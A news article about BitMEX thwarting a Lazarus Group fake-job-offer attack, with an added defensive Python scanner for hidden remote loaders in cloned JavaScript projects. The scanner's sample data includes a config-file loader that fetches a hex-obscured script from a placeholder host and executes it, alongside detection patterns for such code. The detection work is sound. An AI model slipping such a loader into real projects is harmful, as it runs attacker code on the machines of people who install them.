Jun 02, 2025

BitMEX Prevents North Korean Cyberattack, Exposing Hacker Group Mistakes

Photo credit: Piotr Swat / Shutterstock.com

The cryptocurrency exchange BitMEX has successfully stopped an attempted cyberattack by Lazarus Group, a cybercriminal organization linked to North Korea and the 2014 attack on Sony. The attack began with a BitMEX employee receiving a fraudulent job offer on LinkedIn to work at a fake NFT marketplace. 

This is a tactic known to be used by Lazarus, and the employee immediately flagged the email, leading to an investigation.

In the LinkedIn message, the attackers had shared a GitHub repository containing a Next.js/React project, which concealed malicious code designed to execute harmful scripts on BitMEX’s system. 

Among the threats, BitMEX’s security analysts found code that would have fetched obfuscated JavaScript from suspicious domains and executed it. One of those domains had previously been linked to the Lazarus Group by Palo Alto Networks’ Unit 42, the cybersecurity firm’s research team that tracks cybercriminal activity associated with North Korea.
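As an added illustration (not BitMEX's tooling and not code from the article), here is a defender-side triage scan over the files of a cloned project that flags the download-then-execute loader pattern described above: a network source and a dynamic-execution sink in the same file, obfuscated string literals, and remote hosts outside an allow-list. The sample files, hostnames and paths are constructed for the example.

```python
"""Static triage of a cloned JS/TS project for hidden remote-loader code."""
import re

# Sinks that turn downloaded text into running code, and sources that fetch it.
EXEC_SINKS = re.compile(r"\b(eval|new\s+Function|vm\.runInThisContext|vm\.runInNewContext|child_process)\b")
NET_SOURCES = re.compile(r"\b(fetch|axios|https?\.get|https?\.request|XMLHttpRequest)\b")
# Obfuscation hints: runs of hex escapes, char-code assembly, base64 decoding.
OBFUSCATION = re.compile(r"(\\x[0-9a-fA-F]{2}){8,}|String\.fromCharCode|atob\(|Buffer\.from\([^)]*base64")
URL_LITERAL = re.compile(r"https?://([A-Za-z0-9.-]+)")
SCANNED_EXT = (".js", ".jsx", ".ts", ".tsx", ".mjs", ".cjs")

def scan_file(path, text, allowed_hosts=frozenset()):
    """Return human-readable findings for one source file (empty list if clean)."""
    findings = []
    if EXEC_SINKS.search(text) and NET_SOURCES.search(text):
        findings.append(f"{path}: network source + dynamic exec sink (remote loader pattern)")
    if OBFUSCATION.search(text):
        findings.append(f"{path}: obfuscated string literal")
    for host in sorted(set(URL_LITERAL.findall(text))):
        if host not in allowed_hosts:
            findings.append(f"{path}: unexpected remote host {host}")
    # Packed payloads hidden in config files are often a single very long line.
    for lineno, line in enumerate(text.splitlines(), 1):
        if len(line) > 500:
            findings.append(f"{path}:{lineno}: line of {len(line)} chars")
    return findings

def scan_project(files, allowed_hosts=frozenset()):
    """files: {relative path: file contents}. Returns all findings, path-sorted."""
    out = []
    for path in sorted(files):
        if path.endswith(SCANNED_EXT):
            out.extend(scan_file(path, files[path], allowed_hosts))
    return out

# Constructed sample project: one ordinary React page, one config file with a
# loader appended that fetches a hex-obscured path and runs the response.
BENIGN_PAGE = """import { useState } from "react";
export default function Page() {
  const [n, setN] = useState(0);
  return <button onClick={() => setN(n + 1)}>{n}</button>;
}
"""
SUSPICIOUS_CONFIG = r"""const https = require("https");
module.exports = { reactStrictMode: true };
https.get("https://cdn.example.invalid/\x6c\x6f\x61\x64\x65\x72\x2e\x6a\x73", res => {
  let b = ""; res.on("data", d => b += d); res.on("end", () => new Function(b)());
});
"""
SAMPLE_PROJECT = {"pages/index.tsx": BENIGN_PAGE, "next.config.js": SUSPICIOUS_CONFIG}

if __name__ == "__main__":
    for finding in scan_project(SAMPLE_PROJECT):
        print(finding)
```

Run it against a freshly cloned repository by reading each file into the dictionary before opening the project in an IDE or running `npm install`, since both can execute project code.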

Further analysis revealed a rare operational mistake by the attackers that gave BitMEX’s analysts access to a Supabase database the hackers were using. This database contained logs of 37 infected machines, including usernames, hostnames, operating systems, IP addresses, geolocations, and timestamps. 

While most IP addresses were masked using VPNs, one entry was a likely residential IP in Jiaxing, China. This potentially reveals the real location of a Lazarus operator in a significant security lapse for the secretive group.

In response, BitMEX has developed an internal monitoring tool that continuously pings the compromised database, collecting data on infections and further mistakes by the attackers. 

The incident highlights the vulnerability of crypto exchange platforms, as well as the importance of employee training about threats.
